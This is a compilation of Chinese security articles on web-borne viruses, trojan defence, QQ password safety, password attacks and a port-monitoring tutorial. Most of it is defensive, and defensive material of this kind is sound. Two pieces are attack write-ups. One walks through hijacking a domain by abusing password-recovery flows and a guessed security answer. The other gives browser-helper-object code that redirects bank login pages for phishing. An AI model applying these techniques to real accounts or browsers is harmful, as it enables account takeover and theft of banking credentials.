　　四、在网上遇到的一些非法网站，如果它要求你下载或者点击什么东西，要先看看说明，最好不要轻易相信。以前报纸上介绍的因为下载一个程序而造成拨号上网用户支付国际长途电话费就是一个惨痛的教训。

　　像笔者的朋友那样因为在网上不听网页版主的劝告，硬要去试一试那些程序，结果糊里糊涂地硬盘被格，这个教训大家也要好好地汲取。

网页成病毒传播途径三成用户上网染毒

作者：done　来源：赛迪网技术社区

近日，某反病毒论坛开展了一项“您是在进行哪种上网活动时中的病毒”的调查，经过该论坛用户投票，80％以上的用户因为浏览网页而感染病毒，这表明带有恶意代码的网页已经成为病毒传播的最主要途径。近日，某反病毒论坛开展了一项“您是在进行哪种上网活动时中的病毒”的调查，经过该论坛用户投票，80％以上的用户因为浏览网页而感染病毒，这表明带有恶意代码的网页已经成为病毒传播的最主要途径。此次关于列出了六大病毒来源，分别是：

1、上不良网站、浏览不明网页时；

2、收到不明邮件，不小心点击了附件；

3、网上下载软件时感染的病毒；

4、上正规网站浏览信息，未进行其它任何操作莫名中毒；

5、QQ上收到好友发送的不明链接或不明文件，点击后中毒；

6、使用搜索引擎搜索查看信息时感染病毒。投票结果显示，近一半以上的用户是在使用搜索引擎搜索查看信息时感染病毒，同时上正规网站浏览信息未进行其它任何操作而莫名染毒的也占到了近三成的比例。

江民反病毒专家何公道介绍说：“正常浏览网页也能感染病毒，这并不是危言耸听。利用在网页上种植木马、后门等病毒，盗取用户游戏账号及银行密码、偷窥用户隐私，已经成为黑客们惯用的手法。同时黑客利用这种手段的攻击范围之广也是前所未有的，金融类网站、银行网站、门户网站、热门社区网站几乎无一幸免，全都成为黑客们跃跃欲试的目标。由于这类网站每天的浏览量非常大，如果不幸被黑客攻破种植上木马等病毒，所造成的影响无论是从范围上，还是从破坏性上都是巨大的。”经济利益成为主要诱因。据专家分析，在所有被挂马的网站中，这些由于安全漏洞而被恶意挂马的网站只是其中的一部分，更多的则是那些为了经济利益而有意挂马的个人网站。他们帮助病毒制造者将病毒挂在他们的网页上进行传播，并由此获得相应的经济效益。这些有意和无意挂马的网站，都成了病毒传播的主要途径。与此同时，面对逐渐产业化的病毒制造链条，病毒无论是从数量上还是从规模和技术上，对传统杀毒软件来说都是不小的冲击。传统杀毒软件受升级次数和病毒样本收集的限制，在搜集病毒样本上存在一个时间差，因此，如何“先发制毒”，从源头上截断病毒的入侵途径，成为保护用户上网安全的关键，也成为杀毒软件厂商亟需解决的问题。

据了解，目前在国内的杀毒市场上，只江民等少数杀毒软件具备“先发制毒”主动防御的功能。面对日益严峻的安全形势，反病毒专家建议广大用户，要提高网络安全意识，不要随意点击陌生网站链接，及时安装系统安全补丁，选择具有系统监测主动防御及网页滤毒技术的杀毒软件，堵住毒源，确保上网浏览网页安全。

教给网游玩家六大绝技彻底防范灰鸽子

教给网游玩家六大绝技彻底防范灰鸽子

作者：金山　来源：赛迪网

曾经有一个网游爱好者这样形容网络游戏，“网络游戏更像是一场战争，一场玩家与盗号者之间的战争。”由此可见，盗号已经成为网游世界中，令玩家们深恶痛绝的顽疾。

辛辛苦苦积累甚至用金钱买来的游戏装备，竟然不翼而飞，如此遭遇对于一个网游玩家来讲真是欲哭无泪。伴随着网络安全形式的变化，以经济利益为目的的木马日益增多，游戏装备等网络虚拟财产自然成为各类木马的首要窃取目标。有资料显示，网游玩家之中有87%的用户都有过帐号被盗的经历。

而在众多盗取网游帐号密码的木马中，灰鸽子可以说是盗号者最常用、最乐于用的一个木马。电脑一旦感染了灰鸽子木马，将完全被盗号者控制，沦为“肉鸡”。无论是QQ、网络游戏、网络银行的帐号密码，还是重要的机密文件，个人隐私等等信息，盗号者都将非常轻松地窃取，更可怕的是，所有这些破坏行为用户都毫无察觉。

那么面对以灰鸽子为首的盗号木马，作为网络游戏玩家的你，该如何保护自己的帐号密码完好无损，不被窃取呢？

首先，要给自己的电脑做一次“体检”。因为灰鸽子木马的隐蔽性很强，入侵后根本毫无察觉，通过“体检”，检查一下自己的系统是否已经感染灰鸽子。“体检”工具就用免费的灰鸽子木马专杀，比如金山毒霸灰鸽子专杀等。

其次，安装正版杀毒软件，保持实时监控的可靠运行，注意及时更新。灰鸽子的变种非常多，每天都将有不同的变种出现，如果不能及时升级，杀毒软件很难具备对灰鸽子木马新变种的拦截能力。

此外，灰鸽子有个非常“厉害”的特点，黑客可以在远程将控制的所有肉鸡升级到最新版本。新版本就是专门针对杀毒软件而进行了技术处理的版本，避免被最新的杀毒软件检测到。因此除了技术手段防范灰鸽子之外，为了捍卫自己的网络资产，玩家还需要从以下几个方面提高警惕：

1.注意升级系统补丁，可以用windows update或金山漏洞修复2007来检查修复系统漏洞。

2.游戏玩家之间一般有个特定的圈子，要特别警惕某人假冒朋友的QQ发一些程序共享，对网友发来的外挂什么的，要特别警惕。

3.游戏玩家的电脑一般在线时间比较长，要特别留意电脑无人值守时的安全问题。最好把含有隐私信息的数据加密处理。

4.在电脑处于开启状态时，如果不使用摄像头，最好拔掉摄像头，避免被人偷窥。

5.网游玩家通常能熟练的使用线上交易，比如支付宝，网上银行等等。强烈建议使用专业版移动证书型网上银行，完成支付立即拔掉证书，避免被人远程控制电脑支取。

6.使用安全口令，包括系统登录口令，游戏客户端登录口令，网银口令，支付宝帐号，QQ号等等，这些都是自己的财富，应尽可能不使用相同的口令，避免一个被盗，全部被盗。切记这些口令不要在电脑上用明文保存。

同时，金山毒霸反病毒专家建议广大用户，要确保自己的帐号密码万无一失，最重要的就是提高自身的网络安全意识，养成良好的网络使用习惯，此外，如果一旦发现自己的帐号密码被盗，立刻拔掉网线，做物理隔离，然后保留“犯罪现场”，报警或联系安全厂商，请专家进行追查，也许能够根据盗号者留下的信息，挽回损失。

完美卸载发布最新版 提速专杀灰鸽子

作者：棋行人间

近期，灰鸽子病毒猖獗网络，对网民的电脑造成了极大的损害。灰鸽子病毒的七大罪状包括：盗号、偷窥隐私、敲诈、发展“肉鸡”、盗取商业机密、间断性骚扰和恶搞性破坏。完美卸载刚刚发布的V2007 25.90.7326版本中增加了对灰鸽子病毒的专杀功能，在"扫描内存"时自动加载扫描,查杀电脑中的灰鸽子病毒。此外，最新版的完美卸载大幅度提高了查毒速度，大大节省了用户的时间。



点击“扫描内存”开始查毒



清除灰鸽子病毒

[点击下载: 完美卸载完整版]

完美卸载25.90.7326 改进:

1.改进了电脑体检工具的导出报告功能.

2.可以卸载575个插件和恶意程序.

3.新增186个变形恶意软件和木马的特征扫描.

4.全新的第3代查杀引擎,查毒速度更快.

5.改正了简装版启动时无法响应的问题.

6.支持ie7,修正在IE7下个别功能不正常的问题.

7.新增灰鸽子专杀引擎,在"扫描内存"时自动加载扫描.

8.解决MSN误报问题.

网友重要提示:腾讯QQ密码防盗十大建议

qfans 【转载】

1.去腾讯申请密码保护，这样如果密码被破解或自己忘记了还可以利用密码保护功能取回来。

　　2.QQ密码的位数一定要超过8位，而且最好包含数字、字母和特殊符号，否则以现代计算机的超强计算能力，要想暴力破解你的QQ密码简直是易如反掌。

　　3.不要在QQ中填入真实的年龄、E-mail等敏感消息，更不能告诉任何人，小心行得万年船。

　　4.不要随意运行别人发给你的文件，即便那些看起来很诱人的文件也不要轻易地去运行它，往往这样的文件后面都隐藏着不可告人的秘密和危险。

　　5.在网吧上网临走时一定要删除QQ的聊天记录，最好把以你的QQ号码命名的文件夹整个删除，而且要清空回收站。

　　6.注意使用最新版本的QQ，针对QQ的攻击工具大都是针对某一版本的，它的更新不会比QQ的版本升级速度更新更快。

　　7.隐藏自己的真实IP，通过代理服务器上网，可以减少别人发现自己的机会，进而避免被别人攻击。当然对于黑客高手这招用处不太大，值得庆幸的是高手并不是很多。

　　8.事先准备两个常用的密码，登入QQ时使用一个，在使用完毕后右键点击屏幕右下角的QQ图标，选择“个人设定”→“网络安全”→“修改口令”，在“新口令”栏中输入另外一个事先准备好的密码，然后点击“确定”保存修改结果，这样可以防大多数的QQ木马，因为QQ木马大都只记录你登陆时输入的密码，对下线前修改的密码却疏于记录。

　　9.用汉字做QQ的密码使键盘记录机失效。由于绝大部分键盘记录机都只是对键盘输入进行记录，而不能对剪贴板中的密码做记录，所以，如果采用复制的方式拷贝事先准备好的汉字作为QQ密码，则几乎没有被键盘记录机盗取QQ密码的可能，也就没有后顾之忧了。

　　10.使用进程管理软件防QQ密码被盗。记录QQ密码的木马是很隐蔽的，通过按Ctrl+Alt+Del来发现它们是不大可能的。此时，拥有一款进程管理软件就显得很必要，因为以目前木马程序的编写水平，大多数还无法做到隐藏其进程，所以用进程管理软件就可以发现它们，然后终止该进程则可以有效地防范木马。之后，我们就可以放心大胆地去使用QQ了。

用QuickTime窃取Myspace密码的新病毒

作者：杜莉　来源：赛迪网

苹果公司2周前刚给它的QuickTime打过补丁，据一些安全公司称，现在又有一种木马利用QuickTime的另一漏洞来攻击MySpace.com的用户，收集他们的密码等机密信息。

这个木马跟去年年末攻击过MySpace用户的那种木马有些类似，它迫使MySpace.com关闭了数百的个人页面。

跟去年12月的那次攻击一样，现在的这个也是利用QuickTime的“HREF”功能。该功能允许视频含有URL或者JavaScript，显然通过这两者都可以访问网页。跟往常不同，苹果公司没有向所有用户提供QuickTime的补丁，它只是将MySpace链接到拦截代码上去。换句话说，只有MySpace的用户受到了保护。

“这项功能并不是什么严重的bug或者漏洞，但是它有可能被人们滥用，”趋势科技的研究总监Ivan MacIntlel说。

苹果的发言人今天表示说，苹果公司已经在3月5日发布的更新中为QuickTime打上了补丁，并且该公司已于当日发布了应用在Mac OS X和Windows平台上的新版本的QuickTime。

然而，很显然不是所有的QuickTime用户都使用了7.1.5版的补丁；最近那些攻击中的大部分还是利用HREF来在MySpace页面上的QuickTime视频中嵌入恶意脚本。一旦户点击播放这些视频，那么外部网站上的JavaScript木马就会攫取MySpace用户的个人信息。

总部在赫尔辛基的F-Secure公司第一个发现该木马能窃取MySpace用户名，好友ID，MySpace显示名以及其他用户的密码。这些数据被上传到一个域名为Profileawareness.com的服务器上去。该网站只对会员开放，它声称能提供“精确追踪哪些访问了你的MySpace主页”的方案。

尽管MacIntlel无法肯定3月5日发布的QuickTime更新能否防御这种新的攻击——他所在的研究小组仍在继续调查——他认为确实有些人总不及时更新。“通常，人们都不及时更新他们的软件”他说。

MySpace的代表对此事未发表任何评论。

=============================================

原文作者：Gregg Keizer

原文来源：ComputerWorld

原文链接：http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9013702&intsrc=hm_list

一次完全利用社会工程学的域名劫持攻击

作者：snailsor 文章来源：邪恶八进制信息安全团队

本文的内容所涉及到的知识十分粗浅，设置可以说简单到让人鄙视，看完后您或许会有一种借我2元去买彩票或者想揍本人一顿的冲动……

　　域名劫持是一个非常古老的技术，但是一直以来也没有实践过，至于域名劫持的原理谁都很清楚，本文没有利用到市面上一些很古老的相关文章的手段（也不知道能不能成功），完全凭借自己的直觉和对事物逻辑的猜测进行攻击，最终获得了某站的域名控制。您可以以一种饭后笑料的态度来阅读以下粗糙的文字。

　　下文将用1234.net取代被攻击域名，将以h@163.com替代域名管理员信箱。首先要取得该域名的注册机构，管理员信箱地址等信息，www.whois.net可以查到这些。

　　根据返回的信息看，该域名注册在www.bizcn.com注册（商务中国），管理员等人员的信箱均为h@163.com。来到商务中国，选择找回密码服务，由于不知道用户名，首先尝试了该站站长的信箱ID等，都没有成功，后来输入域名1234.net也不行，索性输入1234，然后填上他的信箱地址后确认提交。提示已经将新密码发送到信箱里了。

　　这进一步消除了疑虑，可以确定取得h@163.com就可以拿到商务中国发送过去的新密码并且进而控制域名。以下的思路完全放在取得h@163.com的密码上。到mail.n163.com，找回密码，通过密码提示问题找回密码，它先让我输入生日，随便乱写了几个，例如1999.1.1等，没有成功。

　　网易的密码找回方式有4种，一是提示问题，二是保密邮箱，三是通过手机，最后是通过安全码。尝试了提示问题不行，来到通过安全码方式取回密码，随便输入了几个弱口令和他可能用的ID，例如h等，也不行。通过手机目前来看是不行了（不过这个世界有什么不可能的呢？）。至于他的保密信箱，暂时我不知道，即使知道了也比较难操作（万一保密信箱密码是123456等呢？呵呵）。

　　这样看来知道他的生日是很重要的一个环节了。这个时候目标网站上可能给你信息，google可能给你信息，甚至你去骗他本人也许会成功。访问下他网站看看吧，www.1234.net

　　上面的图里反映出了他的姓名，至少他的2信箱地址，一个是目标信箱一个是sohu的信箱，中间的sina的信箱，在没有证据证明前，不能确定是否他的，因为ID不是h。

　　再回到mail.163.com找回密码，这次通过保密信箱，填了他sohu的信箱，提示新密码已经发送过去了。这样看来进入他sohu的信箱，就可以拿到想要的东西。不过来到sohu发现，你根本没有机会进入他sohu的信箱，因为那里找回密码是通过手机……这时候那个sina这个词给了我提示，为什么不去尝试他sina的邮箱呢？或许里面的个人设置有他的生日等信息……因为大多数人可能在很多地方都用同一个ID，至少我就是这个习惯。

　　来到sina，找回密码，输入id为h，接着让我回答问题（还是sina好，不问什么生日的罗嗦事），随便瞎写了几个，结果是123456……

　　这样就进入了sina的邮箱，在其个人设置里，果然找到了想要的东西，姓名，生日，住址，等等（不知道是真是假，比如我就喜欢填假的身份信息。在没有力证据确认的情况下，真假是无法判断的）。

　　现在一个环节已经打通了，到mail.163.com输入得到的生日，成功来到了回答问题的步骤。问题是：“我是谁”，开始尝试了“我是我”，没成功，突然想到我已经知道他的名字了，输入，填了所有的项目，成功设置了密码。

　　利用新密码登陆信箱，发现了商务中国的密码找回邮件。

　　成功进入了域名控制：

从钓鱼与BHO角度看在线支付安全问题

文章作者：linkboy

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

最近在线支付的安全问题折腾的挺热闹。先是安全控件的问题，然后网站也出了各类漏洞，今天我从钓鱼和BHO的角度看一下在线支付系统的安全问题。

说道钓鱼大家肯定很熟悉,最常说的就是假冒中国工商银行域名，www.1cbc.com.cn,与中国工商银行网站www.icbc.com.cn,也只是"1"和"I"一字之差.不法分子通过设立仿冒网站,骗取该行用户的账号和密码,用户一旦输入了账号及密码,资料就落入了网络钓鱼者的手中。当然我们今天要谈的肯定不是这类老套的话题，也不会是通过修改host文件进行欺骗。今天我要说的是通过BHO进行网络钓鱼。

如果大家以前不巧用过3721，cnnic肯定记得其中的输入中文进入网站的功能。现在3721和cnnic作为流氓软件被各方严打，但是习惯于中文输入的人肯定仍然不少。更何况为了避免进入假冒网站，使用中文输入在他们看来更安全些。于是，一个有趣的问题出现了，如果客户的PC上没有安装3721或者cnnic而他使用中文输入会怎样？如果他安装了类似中文上网软件但是首先运行的并不是他们会怎么样？

我们首先来看第一个问题。如果你使用的是一个没有任何插件的干净的IE，输入任意字母或者中文如“工商银行”，IE会自动查询http://工商银行/，也就IE会自动补全之前的http://以及最后的 /。当然结果很显然http://工商银行/是无法打开的。因此显示

无法显示网页

您正在查找的页当前不可用。 网站可能遇到支持问题，或者您需要 调整您的浏览器设置。

因此如果我们能截获http://工商银行/并将其定义到英文域名就完成了中文上网的功能。

那么如何截获IE地址栏上的数据呢？相信熟悉流氓软件的朋友一定想起了三个字：BHO。

什么是BHO，我们来看一下官方的解释：

BHO是微软早在1999年推出的作为浏览器对第三方程序员开放交互接口的业界标准，它是一种可以让程序员使用简单代码进入浏览器领域的“交互接口”（INTERACTIVED Interface）。通过BHO接口，第三方程序员可以自己编写代码获取浏览器的一些行为（Action）和事件通知（Event），如“后退”、“前进”、“当前页面”等，甚至可以获取浏览器的各个组件信息，像菜单、工具栏、坐标等。由于BHO的交互特性，程序员还可以使用代码去控制浏览器的行为，比如常见的修改替换浏览器工具栏、在浏览器界面上添加自己的程序按钮等操作。

看看前面我提到的BHO接口特性，我们可以看到BHO可以获得和实现IE的大部分事件和功能，程序员可以设计出一个BHO实现用户点击时通知浏览器跳转到某个页面完成交互功能，当然就可以进一步写出控制浏览器跳转到他想让用户去的页面，这就是最初的“浏览器劫持”的成因：BHO劫持。

清楚了这一点我们很容易就想到通过BHO劫持+网络钓鱼，任何所谓的安全控件都是毫无意义的，无论你输入的网址是否正确，最终进入的网站都是钓鱼网站！

以下是实现BHO劫持功能的代码

Copy code

procedure TTIEAdvBHO.DoBeforeNavigate2(const pDisp: IDispatch; var URL,

Flags, TargetFrameName, PostData, Headers: OleVariant;

var Cancel: WordBool);

begin

if URL='https://mybank.icbc.com.cn/icbc/perbank/index.jsp'//对工商银行网银登录页面进行劫持

then begin

Cancel:=True;

URL:='http://www.baidu.com';

(pDisp as IWebbrowser2).Navigate2(URL,Flags,TargetFrameName,PostData,Headers);

end;

if URL='http://工商银行/' //对中文输入工商银行进行劫持

then begin

Cancel:=True;

URL:='http://www.baidu.com';

(pDisp as IWebbrowser2).Navigate2(URL,Flags,TargetFrameName,PostData,Headers);

end;

end;

我们可以看到如果用户输入中文”工商银行”的话，我们可以把它引入的一个自己构造的网站，首页完全模仿工商银行。如果用户是通过进入工商银行首页点连接或通过快捷键等方式直接进入网银登录页面的话我们可以将其引入自己构建的网银登录页面。

至此，很明显通过BHO技术，再好的安全控件也无法保证密码不被窃取---因为安全控件根本没有起作用。

除了BHO劫持外，我们还可以利用BHO直接修改网页内容，由于方法更隐蔽，危害更大--可以直接改变密码提交对象。在这里我就不做代码分析和探讨了。

mail&msn linkboy2007@yahoo.com.cn

ps:

如果进行密码截获，现在很多控件都会屏蔽而且会越做越好，而进行钓鱼的话控件本身就失效了，因此控件不但应该从密码截获方面考虑而应该考虑到其他方法。

由手机上网带来病毒引发的三大疑问?

由手机上网带来病毒引发的三大疑问?

作者：拒绝游泳的鱼　来源：大学生网

早在2001年，手机病毒就现身于世，曾引起媒体的一翻热闹。也许是手机病毒没有大范围传播，也未造成大面积危害，随后，媒体自然降温。是，安全专家一再发出警告，手机正面临病毒威胁。美国计算机安全专家提醒，微软和诺基亚的移动平台在与网络互联时，极易受到电脑病毒的感染，手机将成为“无线病毒”攻击的活靶。最近，有名有姓的手机病毒“卡比尔”和“蚊子”跟踵而至，攻击的目标都是Symbian操作系统的手机。“Symbian”是以诺基亚为主研发的新一代移动系统平台。2002年初，荷兰的一位研究员就发现，许多流行的诺基亚手机所使用的操作系统存在一个Bug，黑客可利用这个Bug，通过发送恶意的SMS信息（约160个字符的简短电子文本信息），攻击手机的操作系统。诺基亚也证实了上述安全漏洞的存在。“卡比尔”和“蚊子”和出现，完全证实了荷兰研究员的发现，其危害性不可低估。在英国，感染了“蚊子”木马的手机，会按地址簿给其它号码发送大量短信，每条短信的信息费超过1英镑，用户根本无法预见，将为此付出巨额信息费开支，而且防不胜防。

据悉，国内还没有出现感染“蚊子”木马病毒的报告。其实，去年以来，国内媒体就一再惊呼：手机病毒来了。天津、山东、北京的部分移动用户先后遭遇手机病毒的侵袭。据称，手机病毒能使手机自动关机、死机，自动转发个人地址簿，甚至烧坏内部芯片。以前发现的手机病毒都是计算机病毒的蔓延，用户从网上下载铃声时，可能会受到感染，反过来说，手机用户不上网，就不会受到感染。“卡比尔”和“蚊子”则大不一样了，它是专门攻击移动平台的手机病毒，凡是基于Symbian操作系统的智能手机和掌上电脑等移动设备，不管你上不上网，由于他人手机的自动传播，你都有可能平白无故受到侵害。目前手机操作系统主要包括Symbian OS、 PalmSource、微软smartphone等，其中Symbian OS是使用最普遍的操作系统。据英国一家调研机构调查，今年第二季度，Symbian在全球移动市场占有率高达41%，接近一半。当对手机病毒的来龙去脉基本弄清之后，我们便产生了这样几个疑问：

智能手机会不会受到冷落？

智能手机开启了无线上网新时代，用户通过手机，可以收发邮件、在线游戏、下载软件、查阅金融证券信息……无线数据业务悄然升温。然而，随着3G时代的来临，手机电脑化，也给手机病毒创造了可乘之机。赛门铁克日本公司研究人员Yuji　Hoshizawa认为，手机和PDA是最容易受到攻击的终端，日本78%的移动用户通过互联网获得旅游、股票行情的信息以及下载游戏，随时都可能成为手机病毒攻击的对象。在美国，目前至少已有300万部手机遭到含有恶意代码的短信息袭击。不能把手机病毒归罪于智能手机，但智能手机成为病毒传播的通道，不能不让用户望而生畏。一条简单的带毒短信，就可能让用户蒙受巨额话费的损失。最笨的用户立即就产生最聪明的想法，如果不用智能手机，就能百毒不侵，高枕无忧。所以，为了免受手机病毒之苦，最好的办法就是，选择只有通话功能的老式手机，拒绝高档的智能手机。移动运营商正在大力开发和推广数据新业务，努力把这个市场做大，以便从来获得更大的利益。面对手机病毒的涌现，移动运营商面临一个最严峻的课题：保障用户的信息安全。

谁来开发手机病毒软件？

自手机病毒现身以来，舆论就有两种观点，一种是手机病毒无大害，另一种是手机病毒将成为猛曾，各有各的道理。专家指出，手机病毒还没有达到令人可怕的地步，因为目前的手机数字处理能力（容量和运算），还不至于强大到可以独立处理、传播病毒。所以，病毒只能通过电脑、WAP服务器、WAP网关来骚扰手机，而对手机本身的实质性破坏，从技术上讲还是非常困难的。目前，对于手机用户来说，只能防毒，还无法进行杀毒。但是，对于杀毒软件开发商来说，手机病毒危害大小，直接影响到他们的开发信心。原因很简单，杀毒软件开发成本高，市场需求有限，谁愿意做赔本生意？事实上，移动通讯设备遭受病毒攻击不可避免，而且受害面积越来越大，手机安全给杀毒厂商的提供了新的商机。据悉，国内厂商已经悄悄进入这一市场，正在加紧开发手机杀毒软件。莫道君行早，更有早行人。韩国SK电讯与计算机安全公司Ahnlab联手，已于近日推出全球首款手机反病毒软件包——“V3Mobile”。机会永远那些有准备的开发者。

移动用户谁堪承受额外开支？

Symbian在全球移动市场占有率近一半，使用基于这个系统的移动终端，就有可能成为手机病毒的受害者。有人提出，未来，用户需要在手机上装N个防病毒软件，并且要不断下载升级软件更新版本，才能堵住安全漏洞，防止病毒的入侵。使用手机，最大的好处，就是图个方便，因为手机病毒，从此就不方便了，并且，还要增加额外开支。用户岂不是成了宁来顺受的冤大头了吗？瑞星总裁刘旭的小账算得很清楚，“我们一直在研究开发手机杀毒软件，将来可以让大家花上十几块钱就能给手机杀毒。这个市场挺大的，1亿多用户，一人给我十几块钱，你算算我能挣多少？”须知，一人十几块钱，不是一次性付出，终身享受。手机病毒前赴后继，杀毒软件就得不断升级，用户就得为防病毒软件以及升级版的操作系统源源不断地付费。这等于是把额外开支强加在用户头上。可以预料到，手机制造商在未来的产品中预设防火墙，并提供免费升级，将是赢得更多用户的新卖点之一。

有病早来医。诺基亚Symbian既然成为手机病毒攻击的目标，那么，不管杀毒软件商如何对待，诺基亚都必须当仁不让，为自己的用户提供最可靠的信息安全保障。其中的道理，还用细说吗？

口令攻击的主要方式及相关防护的手段

作者：hanbin　来源：赛迪网技术社区

如果口令攻击成功黑客进入了目标网络系统，他就能够随心所欲地窃取、破坏和篡改被侵入方的信息，直至完全控制被侵入方。所以，口令攻击是黑客实施网络攻击的最基本、最重要、最有效的方法之一。

口令攻击的主要方法

1、社会工程学(Social Engineering)，通过人际交往这一非技术手段以欺骗、套取的方式来获得口令。避免此类攻击的对策是加强用户意识。

2、猜测攻击。首先使用口令猜测程序进行攻击。口令猜测程序往往根据用户定义口令的习惯猜测用户口令，像名字缩写、生日、宠物名、部门名等。在详细了解用户的社会背景之后，黑客可以列举出几百种可能的口令，并在很短的时间内就可以完成猜测攻击。

3、字典攻击。如果猜测攻击不成功，入侵者会继续扩大攻击范围，对所有英文单词进行尝试，程序将按序取出一个又一个的单词，进行一次又一次尝试，直到成功。据有的传媒报导，对于一个有8万个英文单词的集合来说，入侵者不到一分半钟就可试完。所以，如果用户的口令不太长或是单词、短语，那么很快就会被破译出来。

4、穷举攻击。如果字典攻击仍然不能够成功，入侵者会采取穷举攻击。一般从长度为1的口令开始，按长度递增进行尝试攻击。由于人们往往偏爱简单易记的口令，穷举攻击的成功率很高。如果每千分之一秒检查一个口令，那么86%的口令可以在一周内破译出来。

5、混合攻击，结合了字典攻击和穷举攻击，先字典攻击，再暴力攻击。

避免以上四类攻击的对策是加强口令策略。

6、直接破解系统口令文件。所有的攻击都不能够奏效，入侵者会寻找目标主机的安全漏洞和薄弱环节，饲机偷走存放系统口令的文件，然后破译加密的口令，以便冒充合法用户访问这台主机。

7、网络嗅探(Sniffer)，通过嗅探器在局域网内嗅探明文传输的口令字符串。避免此类攻击的对策是网络传输采用加密传输的方式进行。

8、键盘记录，在目标系统中安装键盘记录后门，记录操作员输入的口令字符串，如很多间谍软件，木马等都可能会盗取你的口述。

9、其他攻击方式，中间人攻击、重放攻击、生日攻击、时间攻击。

避免以上几类攻击的对策是加强用户安全意识，采用安全的密码系统，注意系统安全，避免感染间谍软件、木马等恶意程序。

口令攻击的防护手段

要有效防范口令攻击，我们要选择一个好口令，并且要注意保护口令的安全。

1、好口令是防范口令攻击的最基本、最有效的方法。最好采用字母、数字、还有标点符号、特殊字符的组合，同时有大小写字母，长度最好达到8个以上，最好容易记忆，不必把口令写下来，绝对不要用自己或亲友的生日、手机号码等易于被他人获知的信息作密码。

2、注意保护口令安全。不要将口令记在纸上或存储于计算机文件中；最好不要告诉别人你的口令；不要在不同的系统中使用相同的口令；在输入口令时应确保无人在身边窥视；在公共上网场所如网吧等处最好先确认系统是否安全；定期更改口令，至少六个月更改一次，这会使自己遭受口令攻击的风险降到最低，要永远不要对自己的口令过于自信。

木马安全防护所应知道的几点基本知识

木马安全防护所应知道的几点基本知识

看到这个题目你也许有些奇怪，怎么把这几个词放在了一起，其实谈起端口和木马都是老生常谈 了，但即使是常谈还有很多人的计算机被“冲击波”冲过之后又被“震荡波”狠狠地震了一下，看来很有必要再谈谈老话题，免得再被什么波温柔地扫过。其实说这 些最终的目的就是为了保证计算机的上网安全。

一、 端口

　　一）、端口的一般含义

说到端口，这确实是个老话题，但一切都是从它开始的，不得不说。何谓端口，打个比方，你住在一座房子里，想让别人来拜访你，得在房子上开个大门，你养 了个可爱的小猫，为了它的进出，专门给它修了个小门，为了到后花园，又开了个后门……所有这些为了进到这所房子里而开的门叫端口，这些为了别人进来而开的 端口称它为“服务端口”。

你要拜访一个叫张三的人，张三家应该开了个允许你来的门--服务端口，否则将被拒之门外。去时，首先你在家开个“门”，然后通过这个“门”径直走进张 三家的大门。为了访问别人而在自己的房子开的“门”，称为“客户端口”。它是随机开的而且是主动打开的，访问完就自行关闭了。它和服务端口性质是不一样 的，服务端口是开了个门等着别人来访问，而客户端口是主动打开一个门去打开别人的门，这点一定要清楚。

下面从专业的角度再简单解释一下端口的概念。联网的计算机要能相互通信必须用同一种协议，协议就是计算机通信的语言，计算机之间必须说一种语言才能彼 此通信，Internet的通用语言是TCP/TP，它是一组协议，它规定在网络的第四层运输层有两种协议TCP、UDP。端口就是这两个协议打开的，端 口分为源端口和目的端口，源端口是本机打开的，目的端口是正在和本机通信的另一台计算机的端口，源端口分主动打开的客户端口和被动连接的服务端口两种。在 Internet中，你访问一个网站时就是在本机开个端口去连网站服务器的一个端口，别人访问你时也是如此。也就是说计算机的通讯就像互相串门一样，从这 个门走进哪个门。

当装好系统后默认就开了很多“服务端口”。如何知道自己的计算机系统开了那些端口呢？这就是下面要说的。

二）、查看端口的方法

1、命令方式

下面以Windows XP为例看看新安装的系统都开了那些端口，也就是说都预留了那些门，不借助任何工具来查看端口的命令是netstat，方法如下：

a、在“开始”的“运行”处键入cmd，回车

b、在dos命令界面，键入netstat -na，图2显示的就是打开的服务端口，其中Proto

代表协议，该图中可以看出有TCP和UDP两种协议。Local Address代表本机地址，该地址冒号后的数字就是开放的端口号。Foreign Address代表远程地址，如果和其它机器正在通信，显示的就是对方的地址，State代表状态，显示的LISTENING表示处于侦听状态，就是说该 端口是开放的，等待连接，但还没有被连接。就像你房子的门已经敞开了，但此时还没有人进来。以第一行为例看看它的意思。

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

这一行的意思是本机的135端口正在等待连接。注意:只有TCP协议的服务端口才能处于LISTENING状态。





图1 用netstat命令查看端口状态2、用TCPView工具

为了更好的分析端口，最好用TCPView这个软件，该软件很小只有93KB，而且是个绿色软件，不用安装。

图3是TCPView的运行界面。第一次显示时字体有些小，在“Options”->“Font”中将字号调大即可。TCPView显示的数据 是动态的。图3中Local Address显示的就是本机开放的哪个端口（:号后面的数字），TCPView可以看出哪个端口是由哪个程序发起的。从图3可以看出445、139、 1025、135、5000等端口是开放的，445、139等端口都是system发起的，135等都是SVCHOST发起的。





图2 用TCPView查看端口状态三）、研究端口的目的

1、知道本机开了那些端口，也就是可以进入到本机的“门”有几个，都是谁开的？

2、目前本机的端口处于什么状态，是等待连接还是已经连接，如果是已经连接那就要特别注意看连接是个正常连接还是非正常连接（木马等）？

3、目前本机是不是正在和其它计算机交换数据，是正常的程序防问到一个正常网站还是访问到一个陷阱？

当你上网时就是本机和其它机器传递数据的过程，要传递数据必须要用到端口，即使是有些非常高明的木马利用正常的端口传送数据也不是了无痕迹的，数据在 开始传输、正在传输和结束传输的不同阶段都有各自的状态，要想搞明白上述3个问题，就必须清楚端口的状态变化。下面结合实例先分析服务端口的状态变化。只 有TCP协议才有状态，UDP协议是不可靠传输，是没有状态的。

四）、服务端口的状态变化

先在本机（IP地址为:192.168.1.10）配置FTP服务，然后在其它计算机（IP地址为:192.168.1.1）访问FTP服务，从TCPView看看端口的状态变化。

下面黑体字显示的是从TCPView中截取的部分。

1、LISTENING状态

FTP服务启动后首先处于侦听（LISTENING）状态。

State显示是LISTENING时表示处于侦听状态，就是说该端口是开放的，等待连接，但还没有被连接。就像你房子的门已经敞开的，但还没有人进来。

从TCPView可以看出本机开放FTP的情况。它的意思是:程序inetinfo.exe开放了21端口，FTP默认的端口为21，可见在本机开放了FTP服务。目前正处于侦听状态。

inetinfo.exe:1260 TCP 0.0.0.0:21 0.0.0.0:0 LISTENING

2、ESTABLISHED状态

现在从192.168.1.1这台计算机访问一下192.168.1.10的FTP服务。在本机的TCPView可以看出端口状态变为ESTABLISHED。

ESTABLISHED的意思是建立连接。表示两台机器正在通信。

下面显示的是本机的FTP服务正在被192.168.1.1这台计算机访问。

